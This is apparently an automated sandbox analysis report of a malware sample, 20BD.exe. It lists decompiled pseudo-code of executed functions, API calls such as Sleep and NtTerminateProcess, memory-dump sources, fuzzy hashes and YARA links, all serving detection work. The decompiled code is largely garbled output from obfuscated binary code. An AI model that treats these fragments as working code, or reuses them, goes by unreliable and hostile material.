Opcode Fuzzy Hash: 963b1ec641e54d0a3c948b9f5a1a39febab9ff735ad4ee73f913fea554ebc1e3
Instruction Fuzzy Hash: E2F05435604505E7CF019A91999DB9E7760EF44354F208067F606BF0D1C2BC960A976A

Uniqueness

Uniqueness Score: -1.00%

Function 00402AC0, Relevance: .1, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00402AC0(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __fp0) {
				intOrPtr* _t21;
				void* _t24;
				void* _t27;

				_t24 = __ecx;
				_push(0xffffffb6);
				 *((intOrPtr*)(__ebx + 0x47)) =  *((intOrPtr*)(__ebx + 0x47)) - __ebx;
				_push(__ecx);
				_t23 = 0x2e9e9c3;
				asm("in al, dx");
				asm("cmpsd");
				asm("loopne 0x4");
				asm("sbb al, 0x27");
				_t3 = __ecx - 0x16161681;
				 *_t3 =  *((intOrPtr*)(__ecx - 0x16161681)) - __eax + __eax - _t27;
				_t21 = 2;
				asm("in al, dx");
				if( *_t3 >= 0) {
					_t23 = 0x2e9e9c3 +  *0xf4b01aa;
					_push(ss);
					_push(ss);
					_t21 = 0x2b10;
					_push(0xad);
				}
				asm("lodsd");
				 *_t21 =  *_t21 + _t21;
				 *((intOrPtr*)(_t24 - 0x15)) =  *((intOrPtr*)(_t24 - 0x15)) + _t23;
				_t21 = _t21 + 0xf4eb0301;
				__eax = L0040118A(__eax, __ebx, __ecx, __edi, __eflags);
			}

0x00402ac0
0x00402ac0
0x00402ac2
0x00402ac5
0x00402ac6
0x00402acb
0x00402acc
0x00402acd
0x00402acf
0x00402ad5
0x00402ad5
0x00402adb
0x00402add
0x00402ade
0x00402ae0
0x00402ae6
0x00402ae7
0x00402aed
0x00402afe
0x00402afe
0x00402aff
0x00402b00
0x00402b02
0x00402b05
0x00402b0b

Memory Dump Source

Source File: 0000000D.00000002.937042164.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38ad5de6cc25e238ca772a8d165a14268aad872a468d94c481cb051d14e6d1b8
Instruction ID: 7fe242a26a87a4f58b180528eeead1ac373e7822ac378e6f41f12b53d01bde8d
Opcode Fuzzy Hash: 38ad5de6cc25e238ca772a8d165a14268aad872a468d94c481cb051d14e6d1b8
Instruction Fuzzy Hash: 4A21DB35208145EADF12AE618F5E9AA37349F10344F2400FBAD01751E2DBFD9B02BA1F

Uniqueness

Uniqueness Score: -1.00%

Function 00402AEB, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00402AEB(void* __ebx, void* __edx, void* __edi, void* __fp0) {
				void* _t15;

				_t15 = __ebx;
				while(1) {
					_push(0xad);
					asm("lodsd");
					 *0x2b10 =  *0x2b10 + 0x2b10;
					 *0x0000005D =  *((intOrPtr*)(0x5d)) + _t15;
					__eax = L0040118A(__eax, __ebx, __ecx, __edi, __eflags);
				}
			}

0x00402aeb
0x00402aed
0x00402afe
0x00402aff
0x00402b00
0x00402b02
0x00402b0b
0x00402b0b

Memory Dump Source

Source File: 0000000D.00000002.937042164.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b23133ebc1994eb64dd26a5a6fc160ed452d82aaa0270aa4bfa54eac37b8cc9
Instruction ID: 703404f178dd1594a4d59af797b8ce1b5d4eb18bb8309dbacaae7544c7f15ca3
Opcode Fuzzy Hash: 0b23133ebc1994eb64dd26a5a6fc160ed452d82aaa0270aa4bfa54eac37b8cc9
Instruction Fuzzy Hash: 0A11FE30604106EADF12BE518B5ED7A3335AF10344F2000BBAD02751E1DBFDAB12B61B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: 20BD.exe PID: 6728 Parent PID: 3424 20BD.exeCOMMON

Executed Functions

Function 004017A3, Relevance: 3.1, APIs: 2, Instructions: 56
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E004017A3(signed int __edx, void* __edi, void* __esi, void* __fp0) {

				asm("wait");
				 *(0x7684bd6c + __edx * 4) =  *(0x7684bd6c + __edx * 4) >> 1;
			}

0x004017a6
0x004017aa

APIs

Sleep.KERNELBASE(00001388), ref: 00401859
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 00401881

Memory Dump Source

Source File: 00000014.00000002.861943366.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: aa6c66ade1839c057e54ed95590a2b4f703699917ec1c7b6b3ca2d20bc3bc55b
Instruction ID: 5bd60c2b3e8a068e4466346cbc0defb5667620a0c4f183a3ee32389aea7e8ad2
Opcode Fuzzy Hash: aa6c66ade1839c057e54ed95590a2b4f703699917ec1c7b6b3ca2d20bc3bc55b
Instruction Fuzzy Hash: 3E01C033648100EBE700BA909C42E6A3325AF00700F24C137FA53BA1E1C63EDB22975B

Uniqueness

Uniqueness Score: -1.00%

Function 0040181C, Relevance: 3.1, APIs: 2, Instructions: 55
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 15%

			E0040181C(void* __edx, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t8;
				void* _t11;
				intOrPtr* _t17;
				void* _t20;
				void* _t21;
				void* _t24;

				_t19 = __edx;
				_t8 = 0x1851;
				__eax = __eax + 0xf4ebce62;
				__eflags = __eax;
				_push(0x66);
				L0040115A(_t8, __edx, _t20, _t21, _t24);
				_t17 = _a4;
				Sleep(0x1388);
				_push( &_v8);
				_push(_a12);
				_push(_a8);
				_push(_t17); // executed
				_t11 = E004013A0(_t17, _t20, _t21); // executed
				if(_t11 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t11);
					_push(_t17); // executed
					L0040146D(_t17, _t19, _t20, _t21); // executed
				}
				 *_t17(0xffffffff, 0); // executed
				_push(0x1851);
				asm("les eax, [ebx+ebp*8]");
				_push(0x66);
				__esp = __esp + 4;
				return __eax;
			}

0x0040181c
0x00401830
0x00401832
0x00401832
0x0040183d
0x0040184c
0x00401851
0x00401859
0x0040185f
0x00401860
0x00401863
0x00401866
0x00401867
0x0040186e
0x00401870
0x00401873
0x00401876
0x00401877
0x00401878
0x00401878
0x00401881
0x0040188b
0x00401894
0x004018a3
0x004018a8
0x004018bb

APIs

Sleep.KERNELBASE(00001388), ref: 00401859
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 00401881

Memory Dump Source

Source File: 00000014.00000002.861943366.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 9681a1767b4d508f443fed0373f5985461e0c9db55eb61caf3868fd7a20a383e
Instruction ID: 0d4c73ff1a25ccc0af209e25dff701d5f0484e4d803941be834223819e423ed0
Opcode Fuzzy Hash: 9681a1767b4d508f443fed0373f5985461e0c9db55eb61caf3868fd7a20a383e
Instruction Fuzzy Hash: DA019E33608204EBE7007A949D46D6A3329EF04714F24C137FA07791E1D63E9B22A76B

Uniqueness

Uniqueness Score: -1.00%

Function 00401828, Relevance: 3.0, APIs: 2, Instructions: 50
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E00401828(void* __edx, void* __edi, void* __esi, void* __fp0) {
				void* _t8;
				void* _t11;
				intOrPtr* _t17;
				void* _t22;
				void* _t25;

				_t21 = __esi;
				_t20 = __edi;
				_t19 = __edx;
				asm("enter 0xdd16, 0x68");
				_t8 = 0x1851;
				__eax = __eax + 0xf4ebce62;
				__eflags = __eax;
				_push(0x66);
				L0040115A(_t8, __edx, __edi, __esi, _t25);
				_t17 =  *((intOrPtr*)(_t22 + 8));
				Sleep(0x1388);
				_push(_t22 - 4);
				_push( *((intOrPtr*)(_t22 + 0x10)));
				_push( *((intOrPtr*)(_t22 + 0xc)));
				_push(_t17); // executed
				_t11 = E004013A0(_t17, _t20, _t21); // executed
				if(_t11 != 0) {
					_push( *((intOrPtr*)(_t22 + 0x14)));
					_push( *((intOrPtr*)(_t22 - 4)));
					_push(_t11);
					_push(_t17); // executed
					L0040146D(_t17, _t19, _t20, _t21); // executed
				}
				 *_t17(); // executed
				asm("les eax, [ebx+ebp*8]");
				__esp = __esp + 4;
				__eax = L0040115A(__eax, __edx, __edi, __esi, __eflags);
				__edi = 0x66;
				__esi = 0x1851;
				__ebx = 0xffffffff;
				__esp = __ebp;
				__ebp = 0;
				return __eax;
			}

0x00401828
0x00401828
0x00401828
0x00401828
0x00401830
0x00401832
0x00401832
0x0040183d
0x0040184c
0x00401851
0x00401859
0x0040185f
0x00401860
0x00401863
0x00401866
0x00401867
0x0040186e
0x00401870
0x00401873
0x00401876
0x00401877
0x00401878
0x00401878
0x00401881
0x00401894
0x004018a8
0x004018b2
0x004018b7
0x004018b8
0x004018b9
0x004018ba
0x004018ba
0x004018bb

APIs

Sleep.KERNELBASE(00001388), ref: 00401859
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 00401881

Memory Dump Source

Source File: 00000014.00000002.861943366.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 42bf2d18fab82c1cf26c6973a5f326e6893aee6dc713cdbf8bdbea5eda66952d
Instruction ID: b329b9df0df391f908064f7b6fb4b650575042adab4467ec8a7c1b58a8870e1c
Opcode Fuzzy Hash: 42bf2d18fab82c1cf26c6973a5f326e6893aee6dc713cdbf8bdbea5eda66952d
Instruction Fuzzy Hash: F701B533648200EBE700BB909C42E6A37259F04701F248137FA53791E1D63ED722E72B

Uniqueness

Uniqueness Score: -1.00%

Function 004017DA, Relevance: 3.0, APIs: 2, Instructions: 49
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E004017DA(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				void* _t31;
				void* _t39;
				signed int _t40;

				L0:
				while(1) {
					_t31 = __edi;
					_t16 = __eax;
					__eax = __esp;
					__esp = _t16;
					_t17 = __eax;
					__eax = _t16;
					__esp = _t17;
					__eax = __edi * 0xffffff88;
					__eflags = __eax;
					if(__eflags >= 0) {
						L21:
						_push(0x66);
						__esp = __esp + 4;
						L23:
						__eax = L0040115A(__eax, __edx, __edi, __esi, __eflags);
						__ebx =  *((intOrPtr*)(__ebp + 8));
						Sleep(0x1388);
						__eax = __ebp - 4;
						_push(__ebp - 4);
						_push( *((intOrPtr*)(__ebp + 0x10)));
						_push( *((intOrPtr*)(__ebp + 0xc)));
						_push(__ebx); // executed
						__eax = E004013A0(__ebx, __edi, __esi); // executed
						__eflags = __eax;
						if(__eax != 0) {
							L24:
							_push( *((intOrPtr*)(__ebp + 0x14)));
							_push( *(__ebp - 4));
							L25:
							_push(__eax);
							_push(__ebx); // executed
							__eax = L0040146D(__ebx, __edx, __edi, __esi); // executed
						}
						L26:
						__eax =  *__ebx(0xffffffff, 0); // executed
						L29:
						L27:
						_push(0x1851);
						__eax =  *__esp;
						L28:
						__al = __al & 0x00000083;
						asm("les eax, [ebx+ebp*8]");
						__eax = __eax + 0xefeb0eeb;
						__eflags = __eax;
						L30:
						L35:
						L31:
						_push(0x66);
						L32:
						L33:
						__esp = __esp + 4;
						L34:
						L36:
						__eax = L0040115A(__eax, __edx, __edi, __esi, __eflags);
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						__esp = __ebp;
						_pop(__ebp);
						return __eax;
					} else {
						L14:
						_push(0x867f6b6b);
						goto 0x363cf8f5;
						asm("adc byte [esp+edx*4+0x17b0901f], 0x50");
						if(__eflags > 0) {
							L5:
							asm("stosb");
							_t5 = __eax;
							__eax = __esp;
							__esp = _t5;
							asm("loopne 0xffffffbe");
							_pop(ds);
							asm("stosb");
							_pop(ds);
							asm("ficom dword [eax+0x459c7d17]");
							if(__eflags < 0) {
								L6:
								_push(__edx);
								asm("pushfd");
								asm("movsd");
								_push(__esp);
								asm("repne cmp [0x9494a494], edi");
								asm("loopne 0xffffff9a");
								L7:
								asm("wait");
								_t6 = __eax;
								__eax = __esp;
								__esp = _t6;
								_t7 = __eax;
								__eax = _t6;
								__esp = _t7;
								__eax = __edi;
								__edi = _t6;
								_t10 = 0x7684bd6c + __edx * 4;
								 *_t10 =  *(0x7684bd6c + __edx * 4) >> 1;
								__eflags =  *_t10;
							}
							L8:
							__ebp = 0x7f737684;
						} else {
							L15:
							if (__eflags >= 0) goto L11;
							L16:
							asm("xlatb");
						}
					}
					L37:
				}
				L3:
				_t4 = _t31;
				_t31 = _t39;
				_t39 = _t4;
				if(_t40 > 0) {
					_t2 = _t31 + 0xe;
					 *_t2 =  *(_t31 + 0xe) << 0x4d;
					_t40 =  *_t2;
					asm("cmpsd");
					goto L3;
				}
				return _t31;
				goto L37;
			}

0x004017da
0x004017da
0x004017da
0x004017db
0x004017db
0x004017db
0x004017dc
0x004017dc
0x004017dc
0x004017dd
0x004017dd
0x004017e0
0x0040183d
0x0040183d
0x00401842
0x0040184c
0x0040184c
0x00401851
0x00401859
0x0040185c
0x0040185f
0x00401860
0x00401863
0x00401866
0x00401867
0x0040186c
0x0040186e
0x00401870
0x00401870
0x00401873
0x00401876
0x00401876
0x00401877
0x00401878
0x00401878
0x0040187d
0x00401881
0x0040189a
0x0040188b
0x0040188b
0x00401890
0x00401892
0x00401892
0x00401894
0x00401897
0x00401897
0x0040189d
0x004018af
0x004018a3
0x004018a3
0x004018a4
0x004018a8
0x004018a8
0x004018ab
0x004018b2
0x004018b2
0x004018b7
0x004018b8
0x004018b9
0x004018ba
0x004018ba
0x004018bb
0x004017e2
0x004017e2
0x004017e2
0x004017e7
0x004017ec
0x004017f5
0x00401788
0x00401788
0x00401789
0x00401789
0x00401789
0x0040178a
0x0040178c
0x0040178d
0x0040178e
0x0040178f
0x00401795
0x00401797
0x00401797
0x00401798
0x00401799
0x0040179a
0x0040179b
0x004017a2
0x004017a3
0x004017a6
0x004017a7
0x004017a7
0x004017a7
0x004017a8
0x004017a8
0x004017a8
0x004017a9
0x004017a9
0x004017aa
0x004017aa
0x004017aa
0x004017aa
0x004017ae
0x004017ae
0x004017f7
0x004017f7
0x004017f7
0x004017f8
0x004017f8
0x004017f8
0x004017f5
0x00000000
0x004017e0
0x00401772
0x00401772
0x00401772
0x00401772
0x00401773
0x0040176a
0x0040176a
0x0040176a
0x00401771
0x00000000
0x00401771
0x00401775
0x00000000

APIs

Sleep.KERNELBASE(00001388), ref: 00401859
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 00401881

Memory Dump Source

Source File: 00000014.00000002.861943366.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 28b29540905efe5db8ff2bd5dd41cd95d97ba45c28065df784f5026ed89a0097
Instruction ID: a894bf59af688e7f2aefbaf232239d4a7e11f6dbdc9ab261776b6b6844387aa1
Opcode Fuzzy Hash: 28b29540905efe5db8ff2bd5dd41cd95d97ba45c28065df784f5026ed89a0097
Instruction Fuzzy Hash: 0A018432644201EBEB00BA909D42D6E3325AF44714F248137FA17BA1E1D63EDB22976B

Uniqueness

Uniqueness Score: -1.00%

Function 004017F8, Relevance: 1.5, APIs: 1, Instructions: 45
nativeCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E004017F8(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t30;
				void* _t37;
				signed int _t39;

				L0:
				while(1) {
					_t30 = __eax;
					asm("xlatb");
					__eax =  *__edi * 8;
					__eflags = __eax;
					_t12 = __eax;
					__eax = __esp;
					__esp = _t12;
					_t13 = __eax;
					__eax = _t12;
					__esp = _t13;
					__eax = _t13;
					__esp = _t12;
					if(__eflags > 0) {
						L2:
						asm("cmpsd");
						L3:
						_t3 = _t30;
						_t30 = _t37;
						_t37 = _t3;
						if(_t39 > 0) {
							L1:
							_t1 = _t30 + 0xe;
							 *_t1 =  *(_t30 + 0xe) << 0x4d;
							_t39 =  *_t1;
							goto L2;
						}
						L4:
						return _t30;
					} else {
						L12:
						asm("cld");
						if (__eflags < 0) goto L3;
						L13:
						_t15 = __eax;
						__eax = __edi;
						__edi = _t15;
					}
					L37:
				}
				if(__eflags > 0) {
					__eax = L0040146D(__ebx, __edx, __edi, __esi); // executed
					__eax =  *__ebx(__ebx, __eax); // executed
					__eax =  *__esp;
					__al = __al & 0x00000083;
					asm("les eax, [ebx+ebp*8]");
					__eax = __eax + 0xefeb0eeb;
					__eflags = __eax;
					__esp = __esp + 4;
					__eax = L0040115A(__eax, __edx, __edi, __esi, __eflags);
					__edi = 0x66;
					__esi = 0x1851;
					__ebx = 0xffffffff;
					__esp = __ebp;
					__ebp = 0;
					return __eax;
				} else {
					__bh = __bh &  *(__edi - 0x65);
					asm("clc");
					asm("popfd");
					asm("lodsd");
					asm("enter 0xe0fc, 0x97");
					_t19 = __eax;
					__eax = __esp;
					__esp = _t19;
					_t20 = __eax;
					__eax = _t19;
					__esp = _t20;
					asm("int 0x7f");
					__eax = __ecx;
					__ecx = _t19;
					__bh = 0x7f;
					asm("pushad");
					asm("repne jl 0xffffffd4");
					asm("insd");
					__ebp =  *(__ebx + 0x5f) * 0x5e;
					__eflags = __ebp;
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return __eax;
				}
				goto L37;
			}

0x004017f8
0x004017f8
0x004017f8
0x004017f8
0x004017d0
0x004017d0
0x004017d3
0x004017d3
0x004017d3
0x004017d4
0x004017d4
0x004017d4
0x004017d5
0x004017d5
0x004017d6
0x00401771
0x00401771
0x00401772
0x00401772
0x00401772
0x00401772
0x00401773
0x0040176a
0x0040176a
0x0040176a
0x0040176a
0x00000000
0x0040176e
0x00401775
0x00401775
0x004017d8
0x004017d8
0x004017d8
0x004017d9
0x004017da
0x004017da
0x004017da
0x004017da
0x004017da
0x00000000
0x004017d6
0x004017f9
0x00401878
0x00401881
0x00401890
0x00401892
0x00401894
0x00401897
0x00401897
0x004018a8
0x004018b2
0x004018b7
0x004018b8
0x004018b9
0x004018ba
0x004018ba
0x004018bb
0x004017fb
0x004017fb
0x004017fe
0x004017ff
0x00401801
0x00401802
0x00401806
0x00401806
0x00401806
0x00401807
0x00401807
0x00401807
0x00401808
0x0040180a
0x0040180a
0x0040180b
0x0040180e
0x0040180f
0x00401812
0x00401813
0x00401813
0x00401817
0x00401818
0x00401818
0x00401819
0x00401819
0x00000000

APIs

NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 00401881

Memory Dump Source

Source File: 00000014.00000002.861943366.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 24457665454172ec648fb8d2a6e20ed3a66d6914c2e0f3d8e5c3e978159e5634
Instruction ID: 5d664576ed34e104d60d9d9409068ebedb4ca3d0074abe090f0a839b89efd0e8
Opcode Fuzzy Hash: 24457665454172ec648fb8d2a6e20ed3a66d6914c2e0f3d8e5c3e978159e5634
Instruction Fuzzy Hash: DCF0C233748211DAE205B6599C83B29B3909F11724F24813BE557BB1E2D26E9622525F

Uniqueness

Uniqueness Score: -1.00%

Function 6ABA967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(6ABF1C65,000000FF,00000007,?,00000004,00000000,?,?,?,6ABF1951,00000065,00000000,?,6ABF0C5E,?,00000000), ref: 6ABA9694

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f03124b123cbcdc3b346098f2bca88c313fa64817e9985f6ae931c8c612b82e1
Instruction ID: 5f297fa88016ec5b619e916da867de011b5a19db268a467dad4fb46ba7754387
Opcode Fuzzy Hash: f03124b123cbcdc3b346098f2bca88c313fa64817e9985f6ae931c8c612b82e1
Instruction Fuzzy Hash: 5DB02BB18050C0C6D340D36006087173E00FBC0300F16C031D2020600A4F3CC090F1B1

Uniqueness

Uniqueness Score: -1.00%

Function 6ABA98C0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(6ABF108E,000000FF,000000FF,000000FF,?,001FFFFF,00000002,00000000,6AC407D0,00000058,6ABF0C91,?,00000000,?,00000000), ref: 6ABA98CA

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c8367a1a2cfef1d88cdd072427cbd6aa66e10ab454eda11c5a04ed8df3ffda47
Instruction ID: faae528945a43505231deeec544c890a1767313c275a8cbd0e1777ae2a830b42
Opcode Fuzzy Hash: c8367a1a2cfef1d88cdd072427cbd6aa66e10ab454eda11c5a04ed8df3ffda47
Instruction Fuzzy Hash: F79002A120104483E14161595404F16154A97E0281F95C03AE1019924DCE6DD962B265

Uniqueness

Uniqueness Score: -1.00%

Function 6ABA9820, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(6ABC2EA4,?,00000000,00000000,?,00000220,?,?,?,00000001,?,\??\,?,?,00000002,?), ref: 6ABA982A

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1ea6df28e3a489f3dfcf189097988218773d6e29dfad277af541afbf0a305557
Instruction ID: adf0e204d87e07a52da22ee64d05cff7b92413ac0782e5343ee421aa3fec13ee
Opcode Fuzzy Hash: 1ea6df28e3a489f3dfcf189097988218773d6e29dfad277af541afbf0a305557
Instruction Fuzzy Hash: 5B9002B124104403D18171595404616054AA7D0281F95C036E0414914ECEADDA66BAA1

Uniqueness

Uniqueness Score: -1.00%

Function 6ABA9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(6ABF15BB,00000073,?,00000008,00000000,?,00000568), ref: 6ABA986A

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9a2e83f083a636d6757a876b3a25ede1ccc830bc1ddd4f28772a5451ce5c36cc
Instruction ID: 263101750b33b6cf6722df45cc04122ece962b65232364cdb0e0a39ff49caecf
Opcode Fuzzy Hash: 9a2e83f083a636d6757a876b3a25ede1ccc830bc1ddd4f28772a5451ce5c36cc
Instruction Fuzzy Hash: DC9002B120104413D15161595504717054A97D0281F95C436E0414918DDEAED962B161

Uniqueness

Uniqueness Score: -1.00%

Function 6ABA99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(6ABF1A59,?,000F0007,?,?,00000004,08000000,00000000,00000065,00000000,00000000), ref: 6ABA99AA

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 26e2d14b6f5a837993774f44a5904921f806c5176327db26ae8b5eb64ffaff04
Instruction ID: 1220d45be6fcbd38c9519182fb566ab868025330bc3bc20173c575b05f5b5596
Opcode Fuzzy Hash: 26e2d14b6f5a837993774f44a5904921f806c5176327db26ae8b5eb64ffaff04
Instruction Fuzzy Hash: 1D9002E134104443D14061595414B160546D7E1341F55C039E1054914DCE6DDC627166

Uniqueness

Uniqueness Score: -1.00%

Function 6ABA9600, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(6AB6ED52,?,?,?,?,00020019,00000018,?,?,?,?,\Registry\Machine\Software\Policies\Microsoft\MUI\Settings,00000000), ref: 6ABA960A

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 381c07383ae12601cf795d655ef6df5da16b1a87dd40ac2d4e8f56aabc1a72ed
Instruction ID: e51d411fc14c754c3e4b59aa45fc6ae46dc5d5e2964c3b6dbdb1ff2ee59b34c8
Opcode Fuzzy Hash: 381c07383ae12601cf795d655ef6df5da16b1a87dd40ac2d4e8f56aabc1a72ed
Instruction Fuzzy Hash: D59002B120104443D14062595404B5A4646A7E0341F55C039E0404A14DCDADD8717161

Uniqueness

Uniqueness Score: -1.00%

Function 6ABA9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(6ABF18BF,000000FF,00000000,00000000,0000000C,00001000,00000004,6AC40810,0000001C,6ABF1616), ref: 6ABA966A

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9156df43d170e22a53cd3f3f530f33b693d1fe891a15c96cb9e3c4419cfbb68c
Instruction ID: b50f35ac38309de30237c2724cb706f28cf79240d9095d78cd27da4307a32f4d
Opcode Fuzzy Hash: 9156df43d170e22a53cd3f3f530f33b693d1fe891a15c96cb9e3c4419cfbb68c
Instruction Fuzzy Hash: F39002B120104803D1C07159540465A054697D1341F95C039E0015A14DCE6DDA6977E1

Uniqueness

Uniqueness Score: -1.00%

Function 6ABA9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(6ABF1A79,?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000004,?,000F0007,?,?,00000004), ref: 6ABA978A

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a7991847e9cea2e072937d7a39b25dc0d37074117d1924f7f77610b8eb6e7f03
Instruction ID: b40b0f1345abbfe5627fed361bb912c854bd1207276992004d79f3ecc2750596
Opcode Fuzzy Hash: a7991847e9cea2e072937d7a39b25dc0d37074117d1924f7f77610b8eb6e7f03
Instruction Fuzzy Hash: 7C9002A921304003D1C07159640861A054697D1242F95D439E0005918CCD6DD8797361

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

